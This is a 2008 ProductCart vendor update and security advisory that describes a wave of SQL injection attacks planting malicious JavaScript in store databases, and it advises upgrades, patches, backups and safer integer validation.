ProductCart Update - January 2008. This update covers the following topics: integration with Google Website Optimizer; eBay Add-on; integration with the MailUp E-Mail Marketing system; switch to a WIKI-based documentation system. Thanks for being a ProductCart customer! The Early Impact Team

Security Alert - SQL Injection Attacks - 05.20.08

What's happening

A large wave of SQL injection attacks were launched in the last few days (e.g. see PC World's coverage). A successful attack results in the saving of malicious JavaScript code snippets into the targeted database, including some ProductCart databases.

The JS scripts are placed into database text fields so that when those field values are displayed onto the storefront, the system calls for the execution of the corresponding scripts. The script is than used to launch a malicious attack or spread itself through other SQL injections (here is a more technical explanation of one of these attacks).

Vulnerability in ProductCart version 2.7x

Unfortunately it appears that version 2.7x of ProductCart contains a vulnerability that can be exploited. According to our research:

  • The vulnerability cannot be easily patched
  • The best course of action is for any version 2.7x store to turn the store off and proceed to upgrade to the latest ProductCart version (v3.11)
What To Do
  • Stores running ProductCart v2.7x
    Turn the store off and upgrade to the latest version of ProductCart.
  • Stores running ProductCart version 3.x
    If possible, update to the latest version of ProductCart (version 3.11). If not, download and apply all security patches posted for version 3.x (see version 3.x updates).
  • Stores running ProductCart version 3.11
    Make sure that your MS SQL database is regularly backed up so that if there is a problem, you can restore a previous instance of the store database.

    We are still collecting information and reviewing the situation. If any vulnerabilities are reported in the current version of ProductCart, please rest assured that we will address them right away.

    Technical note
    If you have added custom forms to your store, and you are validating fields to check for integers, make sure NOT to use the isNumeric function, but rather use the validNum function defined in the ProductCart file "includes/stringfunctions.asp". This is a function that we created to remove security issues that exist when using the isNumeric VB function to validate for integers. It was introduced with ProductCart version 3.